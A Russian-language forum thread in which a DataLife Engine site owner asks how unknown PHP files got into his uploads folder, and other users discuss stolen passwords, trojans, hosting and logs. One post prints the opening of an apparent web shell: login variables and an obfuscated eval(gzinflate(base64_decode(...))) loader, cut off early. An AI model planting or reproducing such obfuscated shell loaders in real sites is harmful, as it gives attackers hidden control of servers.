veprj 0 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 (изменено) каким образом у меня в папке могли оказаться эти файлы? версия 5.7 Обнаружены следующие подозрительные файлы: Имя файла: Размер: Дата: ./uploads/files/1176870862_mod_smiles.php 43.31 Kb 18.04.2007 07:34:22 неизвестен дистрибутиву ./uploads/files/1176885045_files.php 43.31 Kb 18.04.2007 11:30:45 неизвестен дистрибутиву ./uploads/files/1176885371_files.php 43.31 Kb 18.04.2007 11:36:11 неизвестен дистрибутиву ./uploads/files/1176885685_files.php 43.31 Kb 18.04.2007 11:41:25 неизвестен дистрибутиву ./uploads/files/1176886593_files.php 15.46 Kb 18.04.2007 11:56:33 неизвестен дистрибутиву ./uploads/files/1176887741_19871.php 110.82 Kb 18.04.2007 12:15:41 неизвестен дистрибутиву ЗЫ кто то влез в админку и выставил там ПХП и ехе. Теперь ворос как он там оказался ? Изменено 20 апреля 2007 пользователем veprj Цитата Ссылка на сообщение Поделиться на других сайтах
sergeant Raven 2 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 что в этих файлах? какой код? Цитата Ссылка на сообщение Поделиться на других сайтах
veprj 0 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 Автор что в этих файлах? какой код? <?PHP //Authentication $login = "1"; //Login $pass = "1"; //Pass $md5_pass = ""; //If no pass then hash eval(gzinflate(base64_decode('HJ3HkqNQEkU/ Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 У меня была такая же фигня 20-ого декабря. Выяснить ничего не удалось... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 veprj, нужно смотреть логи апача за этот промежуток времени, кто был в админпанели и как вошел, если в логах все чисто, значит зашли под вашим паролем, его нужно менять. На вопрос как: 1. Ваш пароль известен 2. Моды или хаки, помогли стать паролю известным. 3. Сторонние скрипты помогли стать паролю известным, тем более если он был одинаковым то вообще элементарно 4. Баг самого скрипта (такой вариант я никогда не исключаю) поэтому нужен анализ логов Цитата Ссылка на сообщение Поделиться на других сайтах
veprj 0 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 Автор К сожалению логи предоставить не могу. Так как отключил на сервере вести журнал. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 К сожалению логи предоставить не могу. Так как отключил на сервере вести журнал. очень зря Цитата Ссылка на сообщение Поделиться на других сайтах
FinRaduga 0 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 каким образом у меня в папке могли оказаться эти файлы? версия 5.7 Обнаружены следующие подозрительные файлы: Имя файла: Размер: Дата: ./uploads/files/1176870862_mod_smiles.php 43.31 Kb 18.04.2007 07:34:22 неизвестен дистрибутиву ./uploads/files/1176885045_files.php 43.31 Kb 18.04.2007 11:30:45 неизвестен дистрибутиву ./uploads/files/1176885371_files.php 43.31 Kb 18.04.2007 11:36:11 неизвестен дистрибутиву ./uploads/files/1176885685_files.php 43.31 Kb 18.04.2007 11:41:25 неизвестен дистрибутиву ./uploads/files/1176886593_files.php 15.46 Kb 18.04.2007 11:56:33 неизвестен дистрибутиву ./uploads/files/1176887741_19871.php 110.82 Kb 18.04.2007 12:15:41 неизвестен дистрибутиву ЗЫ кто то влез в админку и выставил там ПХП и ехе. Теперь ворос как он там оказался ? А ты не пробовал код этих страниц посмотреть? Возможно это файл-менеджер через www-броузер, "заточеный" для взлома. Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 Если пароль украли, то могли сделать через троян, проверься на вирусы. С другой стороны, когда у меня была такая фигня, я у себя пароль не сменил, но после того случая уже 4 месяца все в порядке. Цитата Ссылка на сообщение Поделиться на других сайтах
veprj 0 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 Автор Пароль мой маловероятно могли узнать.Так как я его за день до этого только сменил. Значит в админку как то попали. Цитата Ссылка на сообщение Поделиться на других сайтах
Stude_nt 0 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 (изменено) veprj, Как, доктор говорю, у тебя трой с новейшей сигнатурой... Если память меня не подводит, сервер у тебя на компе стоит, а не на хостинге... Может настроен не очень параноидально сервер?! А для закачки, в скрипт не обязательно лезть, через FTP меняются конфиги замечательно... Изменено 20 апреля 2007 пользователем Stude_nt Цитата Ссылка на сообщение Поделиться на других сайтах
Rokki 0 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 Утверждать не берусь, но не стоит валить все на хостера! Как какой взлом так хостер виноват! Не ужели у нас все хостеры такие лохи что не могут элементарную безапасность нам простым пользователям сделать? Вам не надоело все на третьих лиц валить? Ищити пожалуйста проблемы в своем творении. Уважаемый celsoft (не в обиду сказано) вы можете гарантировать 100% безопасность своего скрипта? Если не можете то большая просьба не доказывать что во всем виноват хостер. От Вашего ответа зависит мои дальнейшие размышления. Метод дедукции Просто столкнулся недавно с ситуацией когда просто положили php файл в корень сервера и воткнули iframe в индексный файл. Варианты типа хостер отпадают сразу, сервер был личный, настройки правильные, логи пока не смотрел да и так понятно от куда ветер дует. Просто больше не откуда было... Цитата Ссылка на сообщение Поделиться на других сайтах
Stude_nt 0 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 Rokki, Была бы дырочка в двиге, эксплойт бы валялся на секьюрети-форумах или обратных, про SQL-инъекцию, тоже бы не умолчали... А так, пока уязвимы версии ниже 5.1, И ТО, если не профиксены... Варианта в принципе три: 1. Троян с новейшей сигнатурой (на компе админа сайта) 2. Хостер был открыт (трой, взлом и т.д) 3. Взломан сайт на этом хостинге (другой скрипт) Но в данном случае, у veprj, вроде как всё на своём компе стоит... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 20 апреля 2007 Рассказать Опубликовано: 20 апреля 2007 Уважаемый celsoft (не в обиду сказано) вы можете гарантировать 100% безопасность своего скрипта? Проблемы с глазами? Четвертый пункт моего сообщения не смогли прочитать? Сил нехватило. Нет мне просто интересно где я в этой теме что либо вообще про хостеров говорил? Просто столкнулся недавно с ситуацией когда просто положили php файл в корень сервера и воткнули iframe в индексный файл. А поповоду iframe в index.php так это батенька давно установлено как из за чего это происходит, меньше клубничку нужно смотреть и троянов собирать. Если вы не вкурсе то изменить файл на который нет прав на записи не может ниодин шелл, только FTP, и троян этот описан очень подробно в отчете лаборатории касперского, так что если не разбираетесь ненужно тут пытатся умные мысли высказывать, тут тема не про iframe обсуждается. Думаете это только DLE от этого страдает? наберите в Яндексе "iframe в index.php" и получите кучу жалоб, где DLE даже не стоял никогда, даже статические index.html были изменены, которые по определению не могут быть с багами. ситуация с iframe была тщательно проанализирована и причиной этому либо хостер либо администратор сайта, чьи пароли забиты в FTP менеджере, кто именно занес трояна я конечно сказать немогу но отсутствие уязвимости скрипта в этом вопросе я могу гарантировать на более чем 100% Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.